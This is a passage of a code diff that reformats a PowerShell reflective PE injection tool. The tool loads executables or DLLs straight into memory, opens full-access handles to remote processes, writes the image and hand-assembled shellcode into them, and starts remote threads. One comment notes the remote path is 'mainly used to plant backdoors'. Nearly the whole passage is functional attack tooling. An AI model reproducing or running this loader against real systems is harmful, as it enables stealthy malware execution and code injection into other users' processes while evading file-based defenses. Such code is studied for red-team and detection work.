-		$PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
-		
-		#Call FreeLibrary for all the imports of the DLL
-		if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)
-		{
-			[IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)
-			
-			while ($true)
-			{
-				$ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)
-				
-				#If the structure is null, it signals that this is the end of the array
-				if ($ImportDescriptor.Characteristics -eq 0 `
-						-and $ImportDescriptor.FirstThunk -eq 0 `
-						-and $ImportDescriptor.ForwarderChain -eq 0 `
-						-and $ImportDescriptor.Name -eq 0 `
-						-and $ImportDescriptor.TimeDateStamp -eq 0)
-				{
-					Write-Verbose "Done unloading the libraries needed by the PE"
-					break
-				}
-
-				$ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi((Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name)))
-				$ImportDllHandle = $Win32Functions.GetModuleHandle.Invoke($ImportDllPath)
-
-				if ($ImportDllHandle -eq $null)
-				{
-					Write-Warning "Error getting DLL handle in MemoryFreeLibrary, DLLName: $ImportDllPath. Continuing anyways" -WarningAction Continue
-				}
-				
-				$Success = $Win32Functions.FreeLibrary.Invoke($ImportDllHandle)
-				if ($Success -eq $false)
-				{
-					Write-Warning "Unable to free library: $ImportDllPath. Continuing anyways." -WarningAction Continue
-				}
-				
-				$ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))
-			}
-		}
-		
-		#Call DllMain with process detach
-		Write-Verbose "Calling dllmain so the DLL knows it is being unloaded"
-		$DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
-		$DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])
-		$DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)
-		
-		$DllMain.Invoke($PEInfo.PEHandle, 0, [IntPtr]::Zero) | Out-Null
-		
-		
-		$Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)
-		if ($Success -eq $false)
-		{
-			Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue
-		}
-	}
-
-
-	Function Main
-	{
-		$Win32Functions = Get-Win32Functions
-		$Win32Types = Get-Win32Types
-		$Win32Constants =  Get-Win32Constants
-		
-		$RemoteProcHandle = [IntPtr]::Zero
-	
-		#If a remote process to inject in to is specified, get a handle to it
-		if (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne ""))
-		{
-			Throw "Can't supply a ProcId and ProcName, choose one or the other"
-		}
-		elseif ($ProcName -ne $null -and $ProcName -ne "")
-		{
-			$Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue)
-			if ($Processes.Count -eq 0)
-			{
-				Throw "Can't find process $ProcName"
-			}
-			elseif ($Processes.Count -gt 1)
-			{
-				$ProcInfo = Get-Process | where { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId
-				Write-Output $ProcInfo
-				Throw "More than one instance of $ProcName found, please specify the process ID to inject in to."
-			}
-			else
-			{
-				$ProcId = $Processes[0].ID
-			}
-		}
-		
-		#Just realized that PowerShell launches with SeDebugPrivilege for some reason.. So this isn't needed. Keeping it around just incase it is needed in the future.
-		#If the script isn't running in the same Windows logon session as the target, get SeDebugPrivilege
-#		if ((Get-Process -Id $PID).SessionId -ne (Get-Process -Id $ProcId).SessionId)
-#		{
-#			Write-Verbose "Getting SeDebugPrivilege"
-#			Enable-SeDebugPrivilege -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants
-#		}	
-		
-		if (($ProcId -ne $null) -and ($ProcId -ne 0))
-		{
-			$RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId)
-			if ($RemoteProcHandle -eq [IntPtr]::Zero)
-			{
-				Throw "Couldn't obtain the handle for process ID: $ProcId"
-			}
-			
-			Write-Verbose "Got the handle for the remote process to inject in to"
-		}
-		
-
-		#Load the PE reflectively
-		Write-Verbose "Calling Invoke-MemoryLoadLibrary"
-		$PEHandle = [IntPtr]::Zero
-		if ($RemoteProcHandle -eq [IntPtr]::Zero)
-		{
-			$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -ForceASLR $ForceASLR
-		}
-		else
-		{
-			$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle -ForceASLR $ForceASLR
-		}
-		if ($PELoadedInfo -eq [IntPtr]::Zero)
-		{
-			Throw "Unable to load PE, handle returned is NULL"
-		}
-		
-		$PEHandle = $PELoadedInfo[0]
-		$RemotePEHandle = $PELoadedInfo[1] #only matters if you loaded in to a remote process
-		
-		
-		#Check if EXE or DLL. If EXE, the entry point was already called and we can now return. If DLL, call user function.
-		$PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
-		if (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -eq [IntPtr]::Zero))
-		{
-			#########################################
-			### YOUR CODE GOES HERE
-			#########################################
-	        switch ($FuncReturnType)
-	        {
-	            'WString' {
-	                Write-Verbose "Calling function with WString return type"
-				    [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "WStringFunc"
-				    if ($WStringFuncAddr -eq [IntPtr]::Zero)
-				    {
-					    Throw "Couldn't find function address."
-				    }
-				    $WStringFuncDelegate = Get-DelegateType @() ([IntPtr])
-				    $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate)
-				    [IntPtr]$OutputPtr = $WStringFunc.Invoke()
-				    $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr)
-				    Write-Output $Output
-	            }
-
-	            'String' {
-	                Write-Verbose "Calling function with String return type"
-				    [IntPtr]$StringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "StringFunc"
-				    if ($StringFuncAddr -eq [IntPtr]::Zero)
-				    {
-					    Throw "Couldn't find function address."
-				    }
-				    $StringFuncDelegate = Get-DelegateType @() ([IntPtr])
-				    $StringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($StringFuncAddr, $StringFuncDelegate)
-				    [IntPtr]$OutputPtr = $StringFunc.Invoke()
-				    $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($OutputPtr)
-				    Write-Output $Output
-	            }
-
-	            'Void' {
-	                Write-Verbose "Calling function with Void return type"
-				    [IntPtr]$VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc"
-				    if ($VoidFuncAddr -eq [IntPtr]::Zero)
-				    {
-					    Throw "Couldn't find function address."
-				    }
-				    $VoidFuncDelegate = Get-DelegateType @() ([Void])
-				    $VoidFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VoidFuncAddr, $VoidFuncDelegate)
-				    $VoidFunc.Invoke() | Out-Null
-	            }
-	        }
-			#########################################
-			### END OF YOUR CODE
-			#########################################
-		}
-		#For remote DLL injection, call a void function which takes no parameters
-		elseif (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -ne [IntPtr]::Zero))
-		{
-			$VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc"
-			if (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero))
-			{
-				Throw "VoidFunc couldn't be found in the DLL"
-			}
-			
-			$VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle
-			$VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle
-			
-			#Create the remote thread, don't wait for it to return.. This will probably mainly be used to plant backdoors
-			$RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions
-		}
-		
-		#Don't free a library if it is injected in a remote process or if it is an EXE.
+        $PEHandle = [IntPtr]::Zero              #This is where the PE is allocated in PowerShell
+        $EffectivePEHandle = [IntPtr]::Zero     #This is the address the PE will be loaded to. If it is loaded in PowerShell, this equals $PEHandle. If it is loaded in a remote process, this is the address in the remote process.
+        if ($RemoteLoading -eq $true)
+        {
+            #Allocate space in the remote process, and also allocate space in PowerShell. The PE will be setup in PowerShell and copied to the remote process when it is setup
+            $PEHandle = $Win32Functions.VirtualAlloc.Invoke([IntPtr]::Zero, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
+
+            #todo, error handling needs to delete this memory if an error happens along the way
+            $EffectivePEHandle = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, $LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
+            if ($EffectivePEHandle -eq [IntPtr]::Zero)
+            {
+                Throw "Unable to allocate memory in the remote process. If the PE being loaded doesn't support ASLR, it could be that the requested base address of the PE is already in use"
+            }
+        }
+        else
+        {
+            if ($NXCompatible -eq $true)
+            {
+                $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
+            }
+            else
+            {
+                $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
+            }
+            $EffectivePEHandle = $PEHandle
+        }
+
+        [IntPtr]$PEEndAddress = Add-SignedIntAsUnsigned ($PEHandle) ([Int64]$PEInfo.SizeOfImage)
+        if ($PEHandle -eq [IntPtr]::Zero)
+        {
+            Throw "VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might be free)."
+        }
+        [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $PEHandle, $PEInfo.SizeOfHeaders) | Out-Null
+
+
+        #Now that the PE is in memory, get more detailed information about it
+        Write-Verbose "Getting detailed PE information from the headers loaded in memory"
+        $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
+        $PEInfo | Add-Member -MemberType NoteProperty -Name EndAddress -Value $PEEndAddress
+        $PEInfo | Add-Member -MemberType NoteProperty -Name EffectivePEHandle -Value $EffectivePEHandle
+        Write-Verbose "StartAddress: $(Get-Hex $PEHandle)    EndAddress: $(Get-Hex $PEEndAddress)"
+
+
+        #Copy each section from the PE in to memory
+        Write-Verbose "Copy PE sections in to memory"
+        Copy-Sections -PEBytes $PEBytes -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types
+
+
+        #Update the memory addresses hardcoded in to the PE based on the memory address the PE was expecting to be loaded to vs where it was actually loaded
+        Write-Verbose "Update memory addresses based on where the PE was actually loaded in memory"
+        Update-MemoryAddresses -PEInfo $PEInfo -OriginalImageBase $OriginalImageBase -Win32Constants $Win32Constants -Win32Types $Win32Types
+
+
+        #The PE we are in-memory loading has DLLs it needs, import those DLLs for it
+        Write-Verbose "Import DLL's needed by the PE we are loading"
+        if ($RemoteLoading -eq $true)
+        {
+            Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants -RemoteProcHandle $RemoteProcHandle
+        }
+        else
+        {
+            Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants
+        }
+
+
+        #Update the memory protection flags for all the memory just allocated
+        if ($RemoteLoading -eq $false)
+        {
+            if ($NXCompatible -eq $true)
+            {
+                Write-Verbose "Update memory protection flags"
+                Update-MemoryProtectionFlags -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -Win32Types $Win32Types
+            }
+            else
+            {
+                Write-Verbose "PE being reflectively loaded is not compatible with NX memory, keeping memory as read write execute"
+            }
+        }
+        else
+        {
+            Write-Verbose "PE being loaded in to a remote process, not adjusting memory permissions"
+        }
+
+
+        #If remote loading, copy the DLL in to remote process memory
+        if ($RemoteLoading -eq $true)
+        {
+            [UInt32]$NumBytesWritten = 0
+            $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $EffectivePEHandle, $PEHandle, [UIntPtr]($PEInfo.SizeOfImage), [Ref]$NumBytesWritten)
+            if ($Success -eq $false)
+            {
+                Throw "Unable to write shellcode to remote process memory."
+            }
+        }
+
+
+        #Call the entry point, if this is a DLL the entrypoint is the DllMain function, if it is an EXE it is the Main function
+        if ($PEInfo.FileType -ieq "DLL")
+        {
+            if ($RemoteLoading -eq $false)
+            {
+                Write-Verbose "Calling dllmain so the DLL knows it has been loaded"
+                $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
+                $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])
+                $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)
+
+                $DllMain.Invoke($PEInfo.PEHandle, 1, [IntPtr]::Zero) | Out-Null
+            }
+            else
+            {
+                $DllMainPtr = Add-SignedIntAsUnsigned ($EffectivePEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
+
+                if ($PEInfo.PE64Bit -eq $true)
+                {
+                    #Shellcode: CallDllMain.asm
+                    $CallDllMainSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x66, 0x83, 0xe4, 0x00, 0x48, 0xb9)
+                    $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xb8)
+                    $CallDllMainSC3 = @(0xff, 0xd0, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
+                }
+                else
+                {
+                    #Shellcode: CallDllMain.asm
+                    $CallDllMainSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xf0, 0xb9)
+                    $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x50, 0x52, 0x51, 0xb8)
+                    $CallDllMainSC3 = @(0xff, 0xd0, 0x89, 0xdc, 0x5b, 0xc3)
+                }
+                $SCLength = $CallDllMainSC1.Length + $CallDllMainSC2.Length + $CallDllMainSC3.Length + ($PtrSize * 2)
+                $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
+                $SCPSMemOriginal = $SCPSMem
+
+                Write-BytesToMemory -Bytes $CallDllMainSC1 -MemoryAddress $SCPSMem
+                $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC1.Length)
+                [System.Runtime.InteropServices.Marshal]::StructureToPtr($EffectivePEHandle, $SCPSMem, $false)
+                $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
+                Write-BytesToMemory -Bytes $CallDllMainSC2 -MemoryAddress $SCPSMem
+                $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC2.Length)
+                [System.Runtime.InteropServices.Marshal]::StructureToPtr($DllMainPtr, $SCPSMem, $false)
+                $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
+                Write-BytesToMemory -Bytes $CallDllMainSC3 -MemoryAddress $SCPSMem
+                $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC3.Length)
+
+                $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
+                if ($RSCAddr -eq [IntPtr]::Zero)
+                {
+                    Throw "Unable to allocate memory in the remote process for shellcode"
+                }
+
+                $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
+                if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
+                {
+                    Throw "Unable to write shellcode to remote process memory."
+                }
+
+                $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
+                $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
+                if ($Result -ne 0)
+                {
+                    Throw "Call to CreateRemoteThread to call GetProcAddress failed."
+                }
+
+                $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
+            }
+        }
+        elseif ($PEInfo.FileType -ieq "EXE")
+        {
+            #Overwrite GetCommandLine and ExitProcess so we can provide our own arguments to the EXE and prevent it from killing the PS process
+            [IntPtr]$ExeDoneBytePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(1)
+            [System.Runtime.InteropServices.Marshal]::WriteByte($ExeDoneBytePtr, 0, 0x00)
+            $OverwrittenMemInfo = Update-ExeFunctions -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -ExeArguments $ExeArgs -ExeDoneBytePtr $ExeDoneBytePtr
+
+            #If this is an EXE, call the entry point in a new thread. We have overwritten the ExitProcess function to instead ExitThread
+            #   This way the reflectively loaded EXE won't kill the powershell process when it exits, it will just kill its own thread.
+            [IntPtr]$ExeMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
+            Write-Verbose "Call EXE Main function. Address: $(Get-Hex $ExeMainPtr). Creating thread for the EXE to run in."
+
+            $Win32Functions.CreateThread.Invoke([IntPtr]::Zero, [IntPtr]::Zero, $ExeMainPtr, [IntPtr]::Zero, ([UInt32]0), [Ref]([UInt32]0)) | Out-Null
+
+            while($true)
+            {
+                [Byte]$ThreadDone = [System.Runtime.InteropServices.Marshal]::ReadByte($ExeDoneBytePtr, 0)
+                if ($ThreadDone -eq 1)
+                {
+                    Copy-ArrayOfMemAddresses -CopyInfo $OverwrittenMemInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants
+                    Write-Verbose "EXE thread has completed."
+                    break
+                }
+                else
+                {
+                    Start-Sleep -Seconds 1
+                }
+            }
+        }
+
+        return @($PEInfo.PEHandle, $EffectivePEHandle)
+    }
+
+
+    Function Invoke-MemoryFreeLibrary
+    {
+        Param(
+        [Parameter(Position=0, Mandatory=$true)]
+        [IntPtr]
+        $PEHandle
+        )
+
+        #Get Win32 constants and functions
+        $Win32Constants = Get-Win32Constants
+        $Win32Functions = Get-Win32Functions
+        $Win32Types = Get-Win32Types
+
+        $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
+
+        #Call FreeLibrary for all the imports of the DLL
+        if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)
+        {
+            [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)
+
+            while ($true)
+            {
+                $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)
+
+                #If the structure is null, it signals that this is the end of the array
+                if ($ImportDescriptor.Characteristics -eq 0 `
+                        -and $ImportDescriptor.FirstThunk -eq 0 `
+                        -and $ImportDescriptor.ForwarderChain -eq 0 `
+                        -and $ImportDescriptor.Name -eq 0 `
+                        -and $ImportDescriptor.TimeDateStamp -eq 0)
+                {
+                    Write-Verbose "Done unloading the libraries needed by the PE"
+                    break
+                }
+
+                $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi((Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name)))
+                $ImportDllHandle = $Win32Functions.GetModuleHandle.Invoke($ImportDllPath)
+
+                if ($ImportDllHandle -eq $null)
+                {
+                    Write-Warning "Error getting DLL handle in MemoryFreeLibrary, DLLName: $ImportDllPath. Continuing anyways" -WarningAction Continue
+                }
+
+                $Success = $Win32Functions.FreeLibrary.Invoke($ImportDllHandle)
+                if ($Success -eq $false)
+                {
+                    Write-Warning "Unable to free library: $ImportDllPath. Continuing anyways." -WarningAction Continue
+                }
+
+                $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))
+            }
+        }
+
+        #Call DllMain with process detach
+        Write-Verbose "Calling dllmain so the DLL knows it is being unloaded"
+        $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
+        $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])
+        $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)
+
+        $DllMain.Invoke($PEInfo.PEHandle, 0, [IntPtr]::Zero) | Out-Null
+
+
+        $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)
+        if ($Success -eq $false)
+        {
+            Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue
+        }
+    }
+
+
+    Function Main
+    {
+        $Win32Functions = Get-Win32Functions
+        $Win32Types = Get-Win32Types
+        $Win32Constants =  Get-Win32Constants
+
+        $RemoteProcHandle = [IntPtr]::Zero
+
+        #If a remote process to inject in to is specified, get a handle to it
+        if (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne ""))
+        {
+            Throw "Can't supply a ProcId and ProcName, choose one or the other"
+        }
+        elseif ($ProcName -ne $null -and $ProcName -ne "")
+        {
+            $Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue)
+            if ($Processes.Count -eq 0)
+            {
+                Throw "Can't find process $ProcName"
+            }
+            elseif ($Processes.Count -gt 1)
+            {
+                $ProcInfo = Get-Process | Where-Object { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId
+                Write-Output $ProcInfo
+                Throw "More than one instance of $ProcName found, please specify the process ID to inject in to."
+            }
+            else
+            {
+                $ProcId = $Processes[0].ID
+            }
+        }
+
+        #Just realized that PowerShell launches with SeDebugPrivilege for some reason.. So this isn't needed. Keeping it around just incase it is needed in the future.
+        #If the script isn't running in the same Windows logon session as the target, get SeDebugPrivilege
+#       if ((Get-Process -Id $PID).SessionId -ne (Get-Process -Id $ProcId).SessionId)
+#       {
+#           Write-Verbose "Getting SeDebugPrivilege"
+#           Enable-SeDebugPrivilege -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants
+#       }
+
+        if (($ProcId -ne $null) -and ($ProcId -ne 0))
+        {
+            $RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId)
+            if ($RemoteProcHandle -eq [IntPtr]::Zero)
+            {
+                Throw "Couldn't obtain the handle for process ID: $ProcId"
+            }
+
+            Write-Verbose "Got the handle for the remote process to inject in to"
+        }
+
+
+        #Load the PE reflectively
+        Write-Verbose "Calling Invoke-MemoryLoadLibrary"
+        $PEHandle = [IntPtr]::Zero
+        if ($RemoteProcHandle -eq [IntPtr]::Zero)
+        {
+            $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -ForceASLR $ForceASLR
+        }
+        else
+        {
+            $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle -ForceASLR $ForceASLR
+        }
+        if ($PELoadedInfo -eq [IntPtr]::Zero)
+        {
+            Throw "Unable to load PE, handle returned is NULL"
+        }
+
+        $PEHandle = $PELoadedInfo[0]
+        $RemotePEHandle = $PELoadedInfo[1] #only matters if you loaded in to a remote process
+
+
+        #Check if EXE or DLL. If EXE, the entry point was already called and we can now return. If DLL, call user function.
+        $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
+        if (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -eq [IntPtr]::Zero))
+        {
+            #########################################
+            ### YOUR CODE GOES HERE
+            #########################################
+            switch ($FuncReturnType)
+            {
+                'WString' {
+                    Write-Verbose "Calling function with WString return type"
+                    [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "WStringFunc"
+                    if ($WStringFuncAddr -eq [IntPtr]::Zero)
+                    {
+                        Throw "Couldn't find function address."
+                    }
+                    $WStringFuncDelegate = Get-DelegateType @() ([IntPtr])
+                    $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate)
+                    [IntPtr]$OutputPtr = $WStringFunc.Invoke()
+                    $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr)
+                    Write-Output $Output
+                }
+
+                'String' {
+                    Write-Verbose "Calling function with String return type"
+                    [IntPtr]$StringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "StringFunc"
+                    if ($StringFuncAddr -eq [IntPtr]::Zero)
+                    {
+                        Throw "Couldn't find function address."
+                    }
+                    $StringFuncDelegate = Get-DelegateType @() ([IntPtr])
+                    $StringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($StringFuncAddr, $StringFuncDelegate)
+                    [IntPtr]$OutputPtr = $StringFunc.Invoke()
+                    $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($OutputPtr)
+                    Write-Output $Output
+                }
+
+                'Void' {
+                    Write-Verbose "Calling function with Void return type"
+                    [IntPtr]$VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc"
+                    if ($VoidFuncAddr -eq [IntPtr]::Zero)
+                    {
+                        Throw "Couldn't find function address."
+                    }
+                    $VoidFuncDelegate = Get-DelegateType @() ([Void])
+                    $VoidFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VoidFuncAddr, $VoidFuncDelegate)
+                    $VoidFunc.Invoke() | Out-Null
+                }
+            }
+            #########################################
+            ### END OF YOUR CODE
+            #########################################
+        }
+        #For remote DLL injection, call a void function which takes no parameters
+        elseif (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -ne [IntPtr]::Zero))
+        {
+            $VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc"
+            if (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero))
+            {
+                Throw "VoidFunc couldn't be found in the DLL"
+            }
+
+            $VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle
+            $VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle
+
+            #Create the remote thread, don't wait for it to return.. This will probably mainly be used to plant backdoors
+            $Null = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions
+        }
+
+        #Don't free a library if it is injected in a remote process or if it is an EXE.
         #Note that all DLL's loaded by the EXE will remain loaded in memory.
-		if ($RemoteProcHandle -eq [IntPtr]::Zero -and $PEInfo.FileType -ieq "DLL")
-		{
-			Invoke-MemoryFreeLibrary -PEHandle $PEHandle
-		}
-		else
-		{
-			#Delete the PE file from memory.
-			$Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)
-			if ($Success -eq $false)
-			{
-				Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue
-			}
-		}
-		
-		Write-Verbose "Done!"
-	}
-
-	Main
+        if ($RemoteProcHandle -eq [IntPtr]::Zero -and $PEInfo.FileType -ieq "DLL")
+        {
+            Invoke-MemoryFreeLibrary -PEHandle $PEHandle
+        }
+        else
+        {
+            #Delete the PE file from memory.
+            $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)
